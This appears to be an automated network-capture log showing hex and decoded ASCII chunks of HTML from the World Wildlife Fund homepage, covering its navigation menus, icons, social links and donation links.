Click\|Our Work - Learn more about our impact" href="https://www.worldwildlife.org/initiatives">Learn more about our impact<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidden="true" class="svg-icon
2023-09-05 11:01:21 UTC	22	IN	Data Raw: 20 30 20 31 31 30 20 31 2e 38 36 48 32 2e 39 33 61 2e 39 33 2e 39 33 20 30 20 30 31 30 2d 31 2e 38 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 70 61 6e 65 6c 22 20 69 64 3d 22 70 72 69 6d 61 72 79 2d 6e 61 76 2d 70 61 6e 65 6c 2d 31 36 35 22 20 72 6f 6c 65 3d 22 72 65 67 69 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 69 6e 76 6f 6c 76 65 64 22 20 68 69 64 64 65 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 6e 6e 65 72 20 6e 61 76 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 76 69 Data Ascii: 0 110 1.86H2.93a.93.93 0 010-1.86z"></path></svg></div></button><div class="nav-item-accordion-panel" id="primary-nav-panel-165" role="region" aria-label="Get involved" hidden><div class="nav-item-accordion-inner nav-item-dropdown"><a class="nav-vi
2023-09-05 11:01:21 UTC	23	IN	Data Raw: 6c 76 65 64 20 2d 20 47 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 73 2f 77 61 79 73 2d 74 6f 2d 73 75 70 70 6f 72 74 2d 77 77 66 22 3e 47 69 76 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 47 65 74 20 69 6e 76 6f 6c 76 65 64 20 2d 20 53 65 6e 64 20 65 63 61 72 64 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 73 2f 73 65 6e 64 2d 66 72 65 65 2d 65 63 61 72 64 73 2d 74 6f 2d 79 6f Data Ascii: lved - Give" href="https://www.worldwildlife.org/pages/ways-to-support-wwf">Give</a></li><li><a class="nav-link" data-track-event="Homepages Show\|Upper Nav Click\|Get involved - Send ecards" href="https://www.worldwildlife.org/pages/send-free-ecards-to-yo
2023-09-05 11:01:21 UTC	24	IN	Data Raw: 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 22 3e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 75 73 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 6e 61 76 2d 73 6f 63 69 61 6c 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 61 72 6f 75 6e 64 3b 22 3e 0a 3c 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 66 75 6e 64 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 53 6f 63 69 61 6c 20 4f 75 74 62 6f 75 6e 64 20 43 6c 69 63 6b 20 2d 20 46 6f 6f 74 65 72 7c 46 61 63 65 62 6f 6f 6b 22 20 64 61 74 61 Data Ascii: orm: uppercase;">Connect with us<div class="header-nav-social" style="display: flex;justify-content: space-around;"><div><a href="https://www.facebook.com/worldwildlifefund" data-track-event="Homepages Show\|Social Outbound Click - Footer\|Facebook" data
2023-09-05 11:01:21 UTC	26	IN	Data Raw: 39 20 30 20 31 38 2e 34 2d 31 30 2e 31 20 31 38 2e 34 2d 31 38 2e 38 35 6c 2d 2e 30 32 2d 2e 38 36 63 31 2e 32 36 2d 2e 39 34 20 32 2e 33 36 2d 32 2e 31 20 33 2e 32 32 2d 33 2e 34 33 7a 22 20 66 69 6c 6c 3d 22 23 31 44 41 31 46 32 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 57 6f 72 6c 64 5f 57 69 6c 64 6c 69 66 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 53 6f 63 69 61 6c 20 4f 75 74 62 6f 75 6e 64 20 43 6c 69 63 6b 20 2d 20 46 6f 6f 74 65 72 7c 49 6e 73 74 61 67 72 61 6d 22 20 64 61 74 61 2d 73 6f 63 69 61 6c 2d 63 6f 6f 6b 69 65 3d 22 69 Data Ascii: 9 0 18.4-10.1 18.4-18.85l-.02-.86c1.26-.94 2.36-2.1 3.22-3.43z" fill="#1DA1F2"></path></svg></a></div><div><a href="https://instagram.com/World_Wildlife" data-track-event="Homepages Show\|Social Outbound Click - Footer\|Instagram" data-social-cookie="i
2023-09-05 11:01:21 UTC	27	IN	Data Raw: 38 20 30 20 30 31 2d 32 2e 30 37 2d 31 2e 33 34 20 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 2d 31 2e 33 34 2d 32 2e 30 37 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 2d 2e 36 32 2d 33 2e 33 35 63 2d 2e 30 39 2d 31 2e 39 2d 2e 31 2d 32 2e 34 36 2d 2e 31 2d 37 2e 32 37 20 30 2d 34 2e 38 2e 30 31 2d 35 2e 33 38 2e 31 2d 37 2e 32 37 2e 30 38 2d 31 2e 37 36 2e 33 37 2d 32 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 Data Ascii: 8 0 01-2.07-1.34 5.58 5.58 0 01-1.34-2.07 9.96 9.96 0 01-.62-3.35c-.09-1.9-.1-2.46-.1-7.27 0-4.8.01-5.38.1-7.27.08-1.76.37-2.71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100
2023-09-05 11:01:21 UTC	28	IN	Data Raw: 20 30 31 2d 31 2e 33 34 2d 32 2e 30 37 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 2d 2e 36 32 2d 33 2e 33 35 63 2d 2e 30 39 2d 31 2e 39 2d 2e 31 2d 32 2e 34 36 2d 2e 31 2d 37 2e 32 37 20 30 2d 34 2e 38 2e 30 31 2d 35 2e 33 38 2e 31 2d 37 2e 32 37 2e 30 38 2d 31 2e 37 36 2e 33 37 2d 32 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 20 31 38 2e 34 38 20 39 2e 32 34 20 39 2e 32 34 20 30 20 30 30 30 2d 31 38 2e 34 38 Data Ascii: 01-1.34-2.07 9.96 9.96 0 01-.62-3.35c-.09-1.9-.1-2.46-.1-7.27 0-4.8.01-5.38.1-7.27.08-1.76.37-2.71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100 18.48 9.24 9.24 0 000-18.48
2023-09-05 11:01:21 UTC	30	IN	Data Raw: 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 2d 2e 36 32 2d 33 2e 33 35 63 2d 2e 30 39 2d 31 2e 39 2d 2e 31 2d 32 2e 34 36 2d 2e 31 2d 37 2e 32 37 20 30 2d 34 2e 38 2e 30 31 2d 35 2e 33 38 2e 31 2d 37 2e 32 37 2e 30 38 2d 31 2e 37 36 2e 33 37 2d 32 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 20 31 38 2e 34 38 20 39 2e 32 34 20 39 2e 32 34 20 30 20 30 30 30 2d 31 38 2e 34 38 7a 4d 31 38 20 32 34 61 36 20 36 20 30 Data Ascii: 9.96 9.96 0 01-.62-3.35c-.09-1.9-.1-2.46-.1-7.27 0-4.8.01-5.38.1-7.27.08-1.76.37-2.71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100 18.48 9.24 9.24 0 000-18.48zM18 24a6 6 0
2023-09-05 11:01:21 UTC	31	IN	Data Raw: 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 2e 35 20 31 30 2e 35 68 32 37 76 31 35 68 2d 32 37 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 32 2e 30 35 20 36 2e 37 36 61 34 2e 35 36 20 34 2e 35 36 20 30 20 30 31 33 2e 32 20 33 2e 32 63 2e 37 35 20 32 2e 38 33 2e 37 35 20 38 2e 37 32 2e 37 35 20 38 2e 37 32 73 30 20 35 2e 39 2d 2e 37 34 20 38 2e 37 32 61 34 2e 35 32 20 34 2e 35 32 20 30 20 30 31 2d 33 2e 31 39 20 33 2e 32 63 2d 32 2e 38 32 2e 37 36 2d 31 34 2e Data Ascii: "none" aria-hidden="true" class="svg-icon "><path fill="#fff" d="M4.5 10.5h27v15h-27z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M32.05 6.76a4.56 4.56 0 013.2 3.2c.75 2.83.75 8.72.75 8.72s0 5.9-.74 8.72a4.52 4.52 0 01-3.19 3.2c-2.82.76-14.
2023-09-05 11:01:21 UTC	32	IN	Data Raw: 32 38 35 61 0d 0a 65 64 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 54 6f 67 67 6c 65 20 41 62 6f 75 74 20 75 73 20 44 72 6f 70 64 6f 77 6e 20 4c 69 6e 6b 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 74 69 74 6c 65 2d 67 72 6f 75 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e 54 6f 67 67 6c 65 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 41 62 6f 75 74 20 75 73 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e Data Ascii: 285aed="false" data-track-event="Homepages Show\|Upper Nav Click\|Toggle About us Dropdown Links"><div class="nav-item-title-group"><div class="nav-item-title"><span class="screen-reader">Toggle</span><span>About us</span><span class="screen-reader">
2023-09-05 11:01:21 UTC	34	IN	Data Raw: 2e 33 2e 33 39 2d 2e 36 35 2e 33 39 2d 31 2e 30 34 20 30 2d 2e 34 32 2d 2e 31 33 2d 2e 37 37 2d 2e 33 39 2d 31 2e 30 34 6c 2d 35 2e 32 37 2d 35 2e 35 33 63 2d 2e 32 36 2d 2e 33 2d 2e 36 2d 2e 34 35 2d 31 2d 2e 34 35 2d 2e 33 37 20 30 2d 2e 37 2e 31 35 2d 2e 39 35 2e 34 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 67 72 6f 75 70 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 67 72 6f 75 70 20 70 72 69 6d 61 72 79 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b Data Ascii: .3.39-.65.39-1.04 0-.42-.13-.77-.39-1.04l-5.27-5.53c-.26-.3-.6-.45-1-.45-.37 0-.7.15-.95.45z"></path></svg></a> <div class="nav-group-wrapper"><div class="nav-group primary"><ul><li><a class="nav-link" data-track-event="Homepages Show\|Upper Nav Click
2023-09-05 11:01:21 UTC	35	IN	Data Raw: 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 6d 61 67 61 7a 69 6e 65 22 3e 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 4d 61 67 61 7a 69 6e 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 41 62 6f 75 74 20 75 73 20 2d 20 4e 65 77 73 72 6f 6f 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 61 62 6f 75 74 2f 6e 65 77 73 2d 70 72 65 73 73 22 3e 4e 65 77 73 72 6f 6f 6d 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d Data Ascii: orldwildlife.org/magazine">World Wildlife Magazine</a></li><li><a class="nav-link" data-track-event="Homepages Show\|Upper Nav Click\|About us - Newsroom" href="https://www.worldwildlife.org/about/news-press">Newsroom</a></li><li><a class="nav-link" data-
2023-09-05 11:01:21 UTC	36	IN	Data Raw: 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 37 2e 38 32 20 31 36 2e 31 38 6c 2d 32 2e 34 32 2d 32 2e 34 31 63 2e 35 34 2d 2e 38 37 2e 38 2d 31 2e 37 38 2e 38 2d 32 2e 37 32 20 30 2d 31 2e 34 2d 2e 35 2d 32 2e 35 39 2d 31 2e 35 2d 33 2e 35 36 41 34 2e 38 37 20 34 2e 38 37 20 30 20 30 30 31 31 2e 31 32 20 36 63 2d 31 2e 34 32 20 30 2d 32 2e 36 34 2e 35 2d 33 2e 36 34 20 31 2e 34 39 41 34 2e 38 32 20 34 2e 38 32 20 30 20 30 30 36 20 31 31 2e 30 35 61 35 2e 30 33 20 35 2e 30 33 20 30 20 30 30 35 2e 31 32 20 35 2e 30 33 63 2e 39 33 20 30 20 31 2e 37 39 2d 2e 32 34 20 32 2e 35 37 Data Ascii: ox="0 0 24 24" fill="none" aria-hidden="true" class="svg-icon "><path d="M17.82 16.18l-2.42-2.41c.54-.87.8-1.78.8-2.72 0-1.4-.5-2.59-1.5-3.56A4.87 4.87 0 0011.12 6c-1.42 0-2.64.5-3.64 1.49A4.82 4.82 0 006 11.05a5.03 5.03 0 005.12 5.03c.93 0 1.79-.24 2.57
2023-09-05 11:01:21 UTC	38	IN	Data Raw: 2e 38 37 20 34 2e 38 37 20 30 20 30 30 31 31 2e 31 32 20 36 63 2d 31 2e 34 32 20 30 2d 32 2e 36 34 2e 35 2d 33 2e 36 34 20 31 2e 34 39 41 34 2e 38 32 20 34 2e 38 32 20 30 20 30 30 36 20 31 31 2e 30 35 61 35 2e 30 33 20 35 2e 30 33 20 30 20 30 30 35 2e 31 32 20 35 2e 30 33 63 2e 39 33 20 30 20 31 2e 37 39 2d 2e 32 34 20 32 2e 35 37 2d 2e 37 32 6c 32 2e 35 20 32 2e 34 36 63 2e 32 33 2e 32 34 2e 35 2e 32 34 2e 37 37 20 30 6c 2e 38 36 2d 2e 38 37 63 2e 31 32 2d 2e 31 2e 31 38 2d 2e 32 33 2e 31 38 2d 2e 33 39 61 2e 34 38 2e 34 38 20 30 20 30 30 2d 2e 31 38 2d 2e 33 38 7a 6d 2d 39 2e 31 34 2d 32 2e 37 32 61 33 2e 32 36 20 33 2e 32 36 20 30 20 30 31 2d 31 2e 30 32 2d 32 2e 34 63 30 2d 2e 39 35 2e 33 34 2d 31 2e 37 35 20 31 2e 30 32 2d 32 2e 34 32 2e 36 37 2d 2e Data Ascii: .87 4.87 0 0011.12 6c-1.42 0-2.64.5-3.64 1.49A4.82 4.82 0 006 11.05a5.03 5.03 0 005.12 5.03c.93 0 1.79-.24 2.57-.72l2.5 2.46c.23.24.5.24.77 0l.86-.87c.12-.1.18-.23.18-.39a.48.48 0 00-.18-.38zm-9.14-2.72a3.26 3.26 0 01-1.02-2.4c0-.95.34-1.75 1.02-2.42.67-.
2023-09-05 11:01:21 UTC	39	IN	Data Raw: 3d 22 4d 32 2e 39 33 20 31 31 2e 30 37 68 31 38 2e 31 34 61 2e 39 33 2e 39 33 20 30 20 31 31 30 20 31 2e 38 36 48 32 2e 39 33 61 2e 39 33 2e 39 33 20 30 20 30 31 30 2d 31 2e 38 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 70 61 6e 65 6c 22 20 69 64 3d 22 61 63 74 69 6f 6e 2d 6e 61 76 2d 32 2d 70 61 6e 65 6c 2d 37 30 22 20 72 6f 6c 65 3d 22 72 65 67 69 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 44 6f 6e 61 74 65 22 20 68 69 64 64 65 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 6e 6e 65 72 20 6e 61 76 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 22 3e 0a 3c 75 6c Data Ascii: ="M2.93 11.07h18.14a.93.93 0 110 1.86H2.93a.93.93 0 010-1.86z"></path></svg></button><div class="nav-item-accordion-panel" id="action-nav-2-panel-70" role="region" aria-label="Donate" hidden><div class="nav-item-accordion-inner nav-item-dropdown"><ul
2023-09-05 11:01:21 UTC	40	IN	Data Raw: 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 44 6f 6e 61 74 65 20 2d 20 52 65 73 70 6f 6e 64 20 74 6f 20 6f 75 72 20 54 56 20 41 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 33 30 35 37 2f 64 6f 6e 61 74 65 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 52 54 56 5f 54 69 67 65 72 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 54 6f 70 6e 61 76 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 3d 41 57 53 32 34 30 32 Data Ascii: span></a> </li><li><a data-track-event="Homepages Show\|Upper Nav Click\|Donate - Respond to our TV Ad" href="https://protect.worldwildlife.org/page/53057/donate/1?en_og_source=Web_DRTV_Tiger&ea.tracking.id=Web_Topnav&supporter.appealCode=AWS2402
2023-09-05 11:01:21 UTC	42	IN	Data Raw: 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 2d 63 6c 6f 73 65 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 2e 39 33 20 31 31 2e 30 37 68 31 38 2e 31 34 61 2e 39 33 2e 39 33 20 30 20 31 31 30 20 31 2e 38 36 48 32 2e 39 33 61 2e 39 33 2e 39 33 20 30 20 30 31 30 2d 31 2e 38 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 70 61 6e 65 6c 22 20 69 64 3d 22 61 63 74 69 6f 6e 2d 6e 61 76 2d 32 2d 70 61 6e 65 6c 2d 37 31 22 20 72 6f 6c 65 3d 22 72 65 67 69 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 64 6f 70 74 22 20 68 69 64 64 65 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e Data Ascii: lass="svg-icon -close"><path d="M2.93 11.07h18.14a.93.93 0 110 1.86H2.93a.93.93 0 010-1.86z"></path></svg></button><div class="nav-item-accordion-panel" id="action-nav-2-panel-71" role="region" aria-label="Adopt" hidden><div class="nav-item-accordion
2023-09-05 11:01:21 UTC	42	IN	Data Raw: 37 66 66 61 0d 0a 0a 3c 73 70 61 6e 3e 41 70 70 61 72 65 6c 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 41 64 6f 70 74 20 2d 20 4d 6f 72 65 20 47 69 66 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 66 74 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 67 69 66 74 2d 63 65 6e 74 65 72 2f 67 69 66 74 73 2f 47 69 66 74 73 2d 61 6e 64 2d 41 63 63 65 73 73 6f 72 69 65 73 2e 61 73 70 78 3f 73 63 3d 41 57 59 32 32 30 39 4f 51 31 38 33 33 35 41 30 32 30 37 33 52 58 26 61 6d 70 3b 73 5f 73 75 62 73 72 63 3d 74 6f 70 6e 61 76 22 3e 0a 3c 73 70 61 6e 3e 4d 6f Data Ascii: 7ffa<span>Apparel</span></a> </li><li><a data-track-event="Homepages Show\|Upper Nav Click\|Adopt - More Gifts" href="https://gifts.worldwildlife.org/gift-center/gifts/Gifts-and-Accessories.aspx?sc=AWY2209OQ18335A02073RX&s_subsrc=topnav"><span>Mo
2023-09-05 11:01:21 UTC	44	IN	Data Raw: 73 5f 49 6e 64 69 61 6e 5f 4f 63 65 61 6e 2f 34 32 35 78 31 37 30 5f 68 61 73 68 2f 32 6e 65 61 62 68 6b 39 7a 76 5f 5f 57 57 31 32 39 37 33 30 39 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 34 32 35 70 78 29 22 3e 0a 3c 69 6d 67 20 61 6c 74 3d 22 4f 6c 69 76 65 20 72 69 64 6c 65 79 20 74 75 72 74 6c 65 20 28 4c 65 70 69 64 6f 63 68 65 6c 79 73 20 6f 6c 69 76 61 63 65 61 29 20 68 61 74 63 68 6c 69 6e 67 73 20 77 61 6c 6b 69 6e 67 20 74 6f 77 61 72 64 73 20 73 65 61 20 61 74 20 73 75 6e 72 69 73 65 2e 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 53 65 61 5f Data Ascii: s_Indian_Ocean/425x170_hash/2neabhk9zv__WW1297309.jpg" media="(min-width: 425px)"><img alt="Olive ridley turtle (Lepidochelys olivacea) hatchlings walking towards sea at sunrise." loading="lazy" src="https://files.worldwildlife.org/wwfcmsprod/images/Sea_
2023-09-05 11:01:21 UTC	45	IN	Data Raw: 65 72 2d 68 6f 72 69 7a 2d 69 6e 20 77 79 73 69 77 79 67 20 6c 65 61 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 6e 31 32 22 3e 0a 3c 73 74 79 6c 65 3e 0a 2f 2a 72 65 6d 6f 76 65 20 74 65 78 74 75 72 65 20 66 72 6f 6d 20 68 65 72 6f 2a 2f 0a 2e 68 6f 6d 65 70 61 67 65 2d 69 6e 74 72 6f 3a 6e 6f 74 28 2e 2d 74 65 78 74 2d 69 6e 73 65 74 29 20 2e 68 6f 6d 65 70 61 67 65 2d 69 6e 74 72 6f 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 6d 61 73 6b 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 7d 0a 2f 2a 63 68 61 Data Ascii: er-horiz-in wysiwyg lead"><div class="span12"><style>/remove texture from hero/.homepage-intro:not(.-text-inset) .homepage-intro__content-wrapper { -webkit-mask-image: none; mask-image: none; padding-top: 10px; margin-top: 0;}/*cha
